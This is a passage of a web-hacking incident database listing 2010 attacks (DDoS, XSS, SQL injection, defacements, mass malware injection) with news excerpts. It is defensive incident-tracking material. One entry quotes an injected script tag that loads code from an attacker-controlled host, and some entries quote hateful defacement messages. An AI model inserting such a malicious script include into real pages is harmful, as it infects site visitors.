Incident Description: Sorry for the outage yesterday between 8:00 AM and 7:00 PM. Virginia Right! was under attack with a Distributed Denial of Service. Part of the problem in resolving the issue is the fact that Virginia Right! is on a shared hosting server with many hosts using the same IP address. The first thing that has to be determined is which domain is under attack. They do this by temporarily assigning a static IP address to each site hosted on the server (as opposed to all of us sharing the same address). When they were done, everyone came back up except – Virginia Right!. So the attacks were specifically directed at us!
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://beforeitsnews.com/news/87/162/Virginia_Right_Under_Fire_Yesterday_With_DDOS_Attack.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-140: Hackers fleece online poker players
WHID ID: 2010-140
Date Occured: 6/28/2010
Attack Method: Malware
Application Weakness: Abuse of Functionality
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: Korea
Incident Description: Police arrested 33 hackers who used a “distribution of denial of service” program to cheat online poker players out of 55 million won ($45,265) from last November through May. The hackers, led by 30-year-old Yu and 29-year-old Kim, were booked without detention on charges of gaining illegal profits. The Cyber Terror Response Center in Gyeonggi said the gang used a DDOS attack to infect 11,000 computers at 700 PC rooms across the country. Police said Yu bought the “Netbot Attacker” program from a Chinese hacker last November, then sold copies online to Kim and others. The gang broke into the administrative systems of the PC rooms and installed the virus in their computers to allow them to see the hands of poker opponents.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://joongangdaily.joins.com/article/view.asp?aid=2922391
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-139: Twitter XSS Vulnerability Possibly Exploited by Turkish Hackers
WHID ID: 2010-139
Date Occured: 6/28/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Dimitris Pagkalos, one of the founders of XSSed, a project that maintains an archive of XSS flaws and raises awareness about this type of Web vulnerability, notes that Twitter's security team promptly addressed the bug. However, he suggests the vulnerability might have been used in an earlier attack that made a rogue status reading "Hacked By Turkish Hackers" appear on almost one thousand Twitter profiles.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Twitter-XSS-Vulnerability-Possibly-Exploited-by-Turkish-Hackers-145594.shtml
Attack Source Geography: Turkey
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-138: Personal data accessed on Blue Cross website
WHID ID: 2010-138
Date Occured: 6/23/2010
Attack Method: Forceful Browsing
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description: In a written statement, Anthem Blue Cross explained how the breach occurred: "The ability to manipulate the web address (URL) was available for a relatively short period of time following an upgrade to the system. After the upgrade was completed, a third party vendor validated that all security measures were in place, when in fact they were not. As soon as the situation was discovered, we made the necessary security changes to prevent it from happening again."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ocregister.com/articles/information-254735-security-anthem.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-137: Persistent XSS on Twitter.com
WHID ID: 2010-137
Date Occured: 6/24/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability on Twitter he found on June 21st using his own Twitter account (visit at your own risk) that appears to be due to a lack of input validation of the application name field when accepting new requests for Twitter applications. Visiting his account on Twitter results in a pair of classic cross site scripting alert boxes, then your browser is manipulated, finally you enter the matrix (see below), and get messages from the researcher who found the vulnerability.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-136: Hotel account hacked, card info stolen
WHID ID: 2010-136
Date Occured: 6/23/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Hospitality
Attacked Entity Geography: Austin, TX
Incident Description: Dozens of Driskill Hotel customers' credit card information has been stolen. Hackers in Europe were able to break into the hotel's parent company's website and steal the information. There are more than 700 victims nationwide.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.kxan.com/dpp/news/hotel-account-hacked,-card-info-stolen
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-135: Another round of Asprox SQL injection attacks
WHID ID: 2010-135
Date Occured: 6/23/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Earlier this month, we reported on a new variant of Asprox malware which was being spammed out by the Pushdo botnet. At that time, the Asprox executables we analyzed were purely sending spam. However, a few days after our post, we noticed reports of mass infections of IIS/ASP websites. The nature of these attacks reminded us of SQL injection attacks back in 2008 where Asprox was clearly involved. We suspected that the re-emergence of Asprox and these new mass website infections were not merely a coincidence. Well, this week our suspicions were confirmed when we came across another version of Asprox which started to launch both spam and SQL injection attacks.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asp
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-134: Major hack of Israeli Twitter accounts
WHID ID: 2010-134
Date Occured: 6/22/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: Israel
Incident Description: According to Mikko Hypponen, chief research officer with F-Secure, more than 1000 accounts on the microblogging social networking service were hacked within the space of 12 hours, each of them broadcasting the message: "Hacked by Turkish Hackers." In a security blog posting made last night, Hypponen said that, although the exploit mechanism is unclear, most of the compromised accounts "seem to belong to Israeli Twitter users."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-magazine.com/view/10426/major-hack-of-israeli-twitter-accounts-/
Attack Source Geography: Turkey
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-133: Druknet websites hacked
WHID ID: 2010-133
Date Occured: 6/19/2010
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Hosting Providers
Attacked Entity Geography: Bhutan
Incident Description: Local internet service provider (ISP) Druknet is currently recovering after 50 of its websites were hacked early yesterday. Users trying to access certain websites hosted by the ISP were greeted with a blank home page and a message that said the website had been hacked. Although some of the hacked websites were back online by afternoon, many websites were still down as of last night. Druknet's web server, on which the websites are stored, was also taken offline periodically throughout yesterday. The hacker or hackers had exploited websites built using free open-source content management systems (CMS), like WordPress, according to Druknet.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.kuenselonline.com/modules.php?name=News&file=article&sid=15822
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-132: Another Opposition Website Shut Down by Hackers
WHID ID: 2010-132
Date Occured: 6/19/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: News
Attacked Entity Geography: Burma
Incident Description: The popular Burmese Web site photayokeking.org, edited by a Burmese army deserter, was recently attacked, leaving it inaccessible and out of operation. According to one of the editors, who goes by the name Photayoke, the Web site came under major attacks on May 27 and June 11, following three smaller attacks. On June 11, the server provider sent an email to the Web site's owners stating that a major distributed denial-of-service attack (DDoS) had been focused on their data center.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.irrawaddy.org/article.php?art_id=18759
Attack Source Geography: Burma
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-131: DoS attack stuffs Turkey's internet censors
WHID ID: 2010-131
Date Occured: 6/18/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Turkey
Incident Description: Access to the internet in Turkey is becoming increasingly ragged, as growing state censorship collides with retaliation by anti-censorship hackers, leading to difficulties both in viewing sites and in using key online functions. Since early this morning the websites of the Ministry of Transportation, the Information and Communication Technologies Authority and the Telecommunications Communication Presidency have been inaccessible. These three state bodies are responsible for internet censorship and have been the principal actors behind attempts to block access to YouTube and Google-related services in Turkey. A number of theories abound, the favourites being that the state authorities' websites have either been hacked or been subjected to a serious denial of service attack by hackers unhappy at the censorship. Writing for the CyberLaw UK Blog, Dr Yaman Akdeniz, Associate Professor at the Faculty of Law, Istanbul Bilgi University, now writes that it has been confirmed as a denial of service attack coordinated by a group of hackers to protest against internet censorship in Turkey, and that the attack lasted 10 hours.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/18/turkey_dos_attack/
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-130: Google Trends Hacked With Racial Slur (Again!)
WHID ID: 2010-130
Date Occured: 6/17/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Search Engine
Attacked Entity Geography: San Jose, California
Incident Description: Google Trends is a powerful tool that many media companies (us included) rely upon for a sense of what new topics people are searching for at any given time -- at least, when it's not getting hacked with racial slurs, which is exactly what happened early this morning. At around 9 a.m. Eastern, instead of the normal list of the hottest new search terms of the hour, visitors to the Google Trends website were greeted with the phrase "lol n------".
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.politicsdaily.com/2010/06/17/google-trends-hacked-with-racial-slur-again/
Attack Source Geography:
Attacked System Technology: Google
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-129: Hackers Seize Top Tory’s Facebook, Blog & Twitter Accounts
WHID ID: 2010-129
Date Occured: 6/17/2010
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: London, England
Incident Description: Hackers have stolen the account details of Therese Coffey, Tory candidate for Suffolk Coastal (UK Parliament constituency), London Spin can exclusively reveal. The attackers bombarded social media users with sexually explicit messages and comments after gaining access to her blog, Facebook and Twitter account details.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.londonspinonline.com/2010/06/exclusive-hackers-seize-top-torys.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-128: Microsoft Sues Alleged Spammer For Circumventing Filters
WHID ID: 2010-128
Date Occured: 6/16/2010
Attack Method: Process Automation
Application Weakness: Abuse of Functionality
Outcome: Spam
Attacked Entity Field: Information Services
Attacked Entity Geography: Washington, USA
Incident Description: Microsoft has sued Connecticut resident Boris Mizhen for allegedly gaming Hotmail's spam filters and sending unwanted emails to consumers. Mizhen, who previously settled a separate spam lawsuit brought by Microsoft, allegedly got around the company's anti-spam system by creating millions of new email accounts and then arranging for those accounts to classify his messages as "not spam," according to the lawsuit. "Defendants developed and executed an elaborate scheme to circumvent Microsoft's Hotmail spam filters to disseminate a large quantity of spam email advertisements to Microsoft's Hotmail users," the company alleges in its complaint, filed last week in federal district court in Seattle. The complaint details how Mizhen and his affiliates allegedly manipulated the statistics that Microsoft's anti-spam system relies on by creating millions of new email accounts and then moving up to 200,000 of their own messages a day from "junk" files into inboxes.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.mediapost.com/publications/?fa=Articles.showArticle&art_aid=130320
Attack Source Geography: Connecticut, USA
Attacked System Technology: Hotmail
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-127: Israeli hacker hits IHH website
WHID ID: 2010-127
Date Occured: 6/17/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Monetary Loss
Attacked Entity Field: Politics
Attacked Entity Geography: Turkey
Incident Description: An Israeli hacker managed to break into the website of Turkish IHH group, which organized the Gaza flotilla, disabling the organization's fundraising mechanism for a few hours. The 30-year-old hacker from Holon, who wished to remain anonymous, said he was concerned with Israel's poor PR efforts and decided to make a contribution of his own. "The real war today is online. I spent an entire week exploring the site, a few hours each night, until I succeeded," he said. The hacker added that he was surprised to learn that IHH received some 9,000 euros in donations every hour via the website. The group is planning to send a second flotilla to Gaza next month.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ynetnews.com/articles/0,7340,L-3906872,00.html
Attack Source Geography: Israel
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-126: Website breached by hacker through SQL injection - exposing personal information of customers
WHID ID: 2010-126
Date Occured: 3/24/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Entertainment
Attacked Entity Geography: New Hampshire, USA
Incident Description: New Hampshire breach notification: HBDirect.com - Website hacked through SQL injection - exposing credit cards of customers from December 1, 2009 to February 10, 2010. 19 NH residents affected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/primary_sources/2548
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-125: Eastern European banks under attack by next-gen crime app
WHID ID: 2010-125
Date Occured: 6/16/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Anti-automation
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Russia
Incident Description: Banks in Russia and Ukraine are under continued siege by criminal gangs wielding a sophisticated, next-generation exploitation kit that hacks the financial institutions' authentication system and then hits it with a denial-of-service attack. The attacks are being carried out with the help of a top-to-bottom revision of BlackEnergy, a popular hack-by-numbers toolkit that until recently was used primarily to launch DDoS, or distributed denial-of-service, attacks. Eastern European criminal gangs are using the expanded capabilities of BlackEnergy 2 to siphon funds out of electronic bank accounts and then assault the financial institutions with more data than they can handle, said Joe Stewart, a researcher with security firm SecureWorks' Counter Threat Unit.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/16/blackenergy2_ddos_attacks/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-124: Riyad Bank Website Gets Hacked
WHID ID: 2010-124
Date Occured: 6/14/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Finance
Attacked Entity Geography: Saudi Arabia
Incident Description: Saudi bank Riyad Bank has been hacked by a group of hackers who posted a message demanding an end to the service of the Mayor of Al Madina province in Saudi Arabia. Al Madina is the second holiest city in Islam and the burial place of the Prophet Muhammad, peace be upon him, and it is the capital of the first Islamic state established by the Prophet and his companions after early Muslims migrated from oppression imposed by their people in Mecca around 1400 years ago. The hacker(s) only managed to hack the homepage of the site, as the internal pages seem intact; the hackers displayed a message on the bank's homepage apologizing to the bank and saying "we are hacking you to deliver a message to the king of Saudi Arabia." They asked him to fire the Mayor.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://arabcrunch.com/2010/06/riyad-bank-website-gets-hacked.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-123: Botnet hijacks web servers for DDoS campaign
WHID ID: 2010-123
Date Occured: 5/13/2010
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Botnet Participation
Attacked Entity Field: Service Providers
Attacked Entity Geography: Netherlands
Incident Description: Researchers at Imperva have discovered an 'experimental' botnet that uses around 300 hijacked web servers to launch high-bandwidth DDoS attacks. The servers are all believed to be open to an unspecified security vulnerability that allows the attacker, who calls him or herself 'Exeman', to infect them with a tiny, 40-line PHP script. This includes a simple GUI from which the attacker can return at a later date to enter in the IP, port and duration numbers for the attack that is to be launched.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com.au/article/346342/botnet_hijacks_web_servers_ddos_campaign/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-122: Attack of WordPress Blogs on Rackspace
WHID ID: 2010-122
Date Occured: 6/15/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: If you follow our blog, you probably noticed that these last few months have been especially hard for hosting companies. Lots of them got hacked, bringing down thousands of sites with them. Now we are hearing reports of a mass hack of WordPress blogs hosted on Rackspace. What is going on? The attackers were able to get access to Rackspace databases and infect the sites through there. They created a new admin user on many WordPress sites, giving them full access to the WordPress admin panel. With that access they were able to inject malware, and as we saw before they used that to inject SEO spam into the sites. One of the posts in that thread also suggests that the attack vector is a vulnerable version (2.11.3) of phpMyAdmin used by Rackspace Cloud. If this is true, hackers must have targeted an XSRF attack at one of the Rackspace admins with MySQL root permissions to gain access to the whole database (probably creating one more admin user). At this point, Rackspace has upgraded their phpMyAdmin nodes. Hopefully they also found any changes in the database made by those hackers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/
Entry Title: WHID 2010-121: Second round of GoDaddy sites hacked
WHID ID: 2010-121
Date Occured: 5/1/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: It seems that a second round of attacks is happening today at GoDaddy and infecting all kinds of sites (Joomla, WordPress, etc.). Looking at the modification dates on the files, they all happened May 1st (today) during the morning from 1 to 3/4 am. All of them had the following JavaScript added to their pages: script src= http://kdjkfjskdfjlskdjf.com/kp.php Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html
Entry Title: WHID 2010-120: Colombian government sites hacked (and spreading malware)
WHID ID: 2010-120
Date Occured: June 2011
Attack Method: Remote File Inclusion (RFI)
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: Colombia
Incident Description: You would expect that a security-related web site would be secure, no? What about an official web site from a Government? Should that be safe? What about a government web site about security? Shouldn’t that be ultra super secure? (yes, I am joking) That’s not always the case… At Sucuri Security we have two main goals: monitor your visible Internet presence (via DNS, site content changes, whois, blacklisting status, etc.), and also monitor what is not visible (or not easily accessible). So we run multiple honey pots, we monitor IRC chats used by botnets and attackers, multiple forums, etc. All with the goal of protecting our clients and notifying them if we see any issue in the “underground”. With this work, we get to see a lot of sites being exploited and attacked. Most of them are small sites, but sometimes we see big companies, .govs and many .edus in there. One of those government web sites is from Colombia. And they are not a normal .gov site, they are about security and about cyber crimes. They have two web sites that are currently hacked: http://www.delitosinformaticos.gov.co (related to solving cyber crimes) and http://www.frentesdeseguridad.gov.co (related to security in general). We tried to contact them and got no replies. We would have waited a little longer to publish it, but since clem1 mentioned them on our post about Georgia government sites hacked, I think it is time to use full disclosure to get them fixed.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/02/colombia-government-sites-hacked-and-spreading-malware.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-119: Georgia government sites hacked (and spreading malware)
WHID ID: 2010-119
Date Occured: 2/15/2010
Attack Method: Remote File Inclusion (RFI)
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: Imereti, GE
Incident Description: *UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect. You know, you would think that after all the attacks that Georgia suffered in 2008 they would be more careful about the security of their sites. Well, not really. Even after I sent a bunch of emails to all their addresses that I could find and requested on Twitter for contacts in the .ge government, nobody replied and they are still hacked, spreading malware and attacking other systems. It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t deface their web page. They just added some malware and scripts to attack others. How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/02/georgia-government-sites-hacked-and-spreading-malware.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-118: Two Korean govt. websites attacked by hackers
WHID ID: 2010-118
Date Occured: 6/12/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography: South Korea
Incident Description: Two South Korean government Web sites were attacked again Saturday by hackers traced to China, but there was no major damage, the home ministry said. The sites of the Ministry of Justice and the Korea Culture and Information Service were hit by a massive number of access attempts in what is known as a distributed denial-of-service (DDoS) attack from 247 China-based Internet servers, according to the Ministry of Public Administration and Security.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.yonhapnews.co.kr/techscience/2010/06/12/73/0601000000AEN20100612002100315F.HTML
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-117: Turkish Hacker Hijacks .CO.IL MSN and Hotmail Domains
WHID ID: 2010-117
Date Occured: 6/10/2010
Attack Method: DNS Hijacking
Application Weakness: Insufficient Process Validation
Outcome: Defacement
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: A Turkish hacker has managed to hijack msn.co.il and hotmail.co.il, two domains belonging to Microsoft, and use them to post a pro-Palestinian message. The name servers and administrative email address for the domains have been changed. Users who accessed hotmail.co.il and msn.co.il earlier today were greeted by a page displaying the image of a child wearing the Palestinian flag as a cape and a message reading, "Free Palestine. Hi to greatest [expletive] of the world (i mean all the Jews). u think one day u will own all the world eh? Lol that makes me laugh. that makes all the world laugh. u are just insects. make muslims angrier and just sit and watch what will happen to you." The attacker signs the message as TurkGuvenligi Tayfa ("from Turkey with love") and sends greetings to Pakbugs, a notorious group of hackers and defacers. It appears that the two Microsoft domains, which normally redirect users to login.live.com and il.msn.com, respectively, had their name server information altered. The new ns1.dollar2host.com and ns2.dollar2host.com name servers, which belong to a private Web hosting company, replaced the usual ns1.msft.net and ns2.msft.net that Microsoft used for its domains.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Turkish-Hacker-Hijacks-CO-IL-MSN-and-Hotmail-Domains-144299.shtml
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-116: Hackers: Data Breach Exposed iPad Owners' Personal Info
WHID ID: 2010-116
Date Occured: 6/9/2010
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description: A security flaw in AT&T's network exposed the e-mail addresses of more than 100,000 owners of Apple's 3G iPad, according to a report published by Gawker today. Calling it the "most exclusive e-mail list on the planet," Gawker said the list of exposed owners included New York Mayor Michael Bloomberg, White House Chief of Staff Rahm Emanuel and other powerful figures in finance, media and politics. The security hole was uncovered by Goatse Security, a group known among security experts as hackers who enjoy pulling Web pranks, Gawker reported. Still, the group previously has uncovered flaws in the browsers Firefox and Safari, Gawker said. When contacted by ABCNews.com, a man who asked to be named as a Goatse employee confirmed Gawker's report. "It's absolutely real," he said, adding that the group gave the Gawker reporter their data set and he was able to verify the information. The employee said someone in his organization learned that when given an iPad owner's unique identification number, a program on AT&T's website would return the e-mail address connected to that account. Once the hole was uncovered, he said, the group was able to write a script that would automatically predict ID numbers and return the associated e-mail addresses. In about six hours, he said, the group was able to scrape information for about 114,000 iPad 3G owners, but he did not say how many iPad owners could have been affected in total.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://abcnews.go.com/print?id=10871229
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-115: Mass hack plants malware on thousands of webpages
WHID ID: 2010-115
Date Occured: 6/9/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: More than 100,000 webpages, some belonging to newspapers, police departments, and other large organizations, have been hit by an attack over the past few days that redirected visitors to a website that attempted to install malware on their machines. The mass compromise appears to have affected sites running a banner-ads module on top of Microsoft's Internet Information Services using ASP.NET, said David Dede, head of malware research at Sucuri, a website monitoring firm. The sites were infected using SQL injection exploits, which allow attackers to tamper with a server's database by typing commands into search boxes and other user-input fields. The hackers used the exploit to plant iframes in the compromised sites that redirected visitors to robint.us. Malicious JavaScript on that site attempted to infect end users with malware dubbed Mal/Behav-290, according to anti-virus firm Sophos.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/09/mass_webpage_attack/
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-114: Seven held in Andhra for hacking passport software
WHID ID: 2010-114
Date Occured: 6/4/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Process Validation
Outcome: Extortion
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description: Seven people were arrested in Andhra Pradesh for hacking the online passport application software of the Hyderabad regional passport office, police said Friday. Police Commissioner A.K. Khan told reporters that seven people, among them five passport agents, were arrested and a search was on for two other agents involved in the racket. The passport office releases online slots for confirmed dates of appointments to the applicants for obtaining passports under 'Tatkal' scheme through its website www.passport.gov.in. Every day these slots were visible to the users only for a few minutes till the slots released by the passport authorities were exhausted. The accused hacked the website, blocked the online slots and were selling the same to the applicants for huge sums, police said.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://sify.com/news/seven-held-in-andhra-for-hacking-passport-software-news-national-kger4bcghcf.html
Attack Source Geography: India
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-113: Facebook plugs email address indexing bug
WHID ID: 2010-113
Date Occured: 6/4/2010
Attack Method: Unintentional Information Disclosure
Application Weakness: Insecure Indexing
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Incident-prone social network monolith Facebook has plugged yet another security leak, this time involving the indexing by search engines of email addresses not listed on Facebook. Thousands of email addresses submitted using Facebook's "Find a friend" feature that were not tied to a Facebook account wound up getting indexed by Google, according to blogger Cory Watilo, who was among those affected. "One obvious problem is that spammers can easily scrape this data and easily add legitimate addresses to their lists, many of whom might not give their addresses to Facebook for a reason," Watilo writes. The issue sparked a lively discussion thread on Hacker News. Facebook changed its robots.txt file to prevent the search engine from indexing the relevant "opt out of emails from Facebook" page so that email address data can no longer be harvested by spammers or other miscreants.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/04/facebook_email_indexing_snafu/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-112: Turkish Cyber Hackers Strike at Israel
WHID ID: 2010-112
Date Occured: 6/2/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Israel
Incident Description: The unofficial Likudnik website was targeted by angry Turkish hackers who were apparently less than pleased with the IDF Navy commando operation which prevented the terrorists on board from breaking the Gaza embargo on Hamas-controlled Gaza.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theyeshivaworld.com/news/Israeli+News/60651/Turkish-Cyber-Hackers-Strike-at-Israel.html
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-111: Thieves steal virtual furniture from unsuspecting Hotel Habbo players
WHID ID: 2010-111
Date Occured: 6/2/2010
Attack Method: Phishing
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: Finland
Incident Description: Finnish police are searching for thieves who stole 1,000 Euros (about $1,200 U.S.) worth of virtual furniture and other items from the virtual world Habbo Hotel. The thieves allegedly used phishing scams to capture usernames and passwords from Habbo Hotel users, who contacted Finnish police after they noticed that their virtual goods were missing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.gamezebo.com/news/2010/06/02/thieves-steal-virtual-furniture-unsuspecting-hotel-habbo-players
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-110: Local restaurant's computer hacked, customers' card numbers stolen
WHID ID: 2010-110
Date Occured: 5/22/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
